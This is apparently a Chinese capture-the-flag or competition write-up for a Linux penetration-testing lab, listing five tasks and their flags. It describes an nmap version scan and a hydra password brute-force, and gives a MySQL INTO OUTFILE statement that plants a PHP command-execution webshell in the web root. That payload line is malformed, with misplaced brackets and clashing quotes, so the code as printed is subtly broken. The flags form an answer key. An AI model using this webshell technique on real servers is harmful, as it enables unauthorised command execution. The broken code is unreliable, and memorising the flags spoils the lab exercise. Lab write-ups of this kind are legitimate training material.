Linux 操作系统渗透测试
任务环境说明:
- 服务器场景:Server18-2(关闭链接)
- 服务器场景操作系统:Linux(版本不详)
1.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行系统服务及版本扫 描渗透测试,并将该操作显示结果中 MySQL 数据库对应的服务版本信息字符串 作为 FLAG 提交;
这里使用nmap扫描添加参数-sV即可扫描出版本号
flag:MySQL 5.1.73-log
2.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行渗透测试,将该场 景/var/www/html 目录中唯一一个后缀为.html 文件的文件名称作为 FLAG 提交;
使用hydra暴力破解出密码为3112ab,然后进行远程连接上传一句话木马
select '<?php @system($_GET['cmd'];?)>' into outfile '/var/www/html/a.php';
flag:loginmanager
3.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行渗透测试,将该场 景/var/www/html 目录中唯一一个后缀为.html 文件的文件内容作为 FLAG 提交;
flag:slkrvung
4.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行渗透测试,将该场 景/root 目录中唯一一个后缀为.bmp 文件的文件名称作为 FLAG 提交;
flag:vmifeo.bmp
5.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行渗透测试,将该场 景/root 目录中唯一一个后缀为.bmp 的图片文件中的英文单词作为 FLAG 提交。
flag:glamorous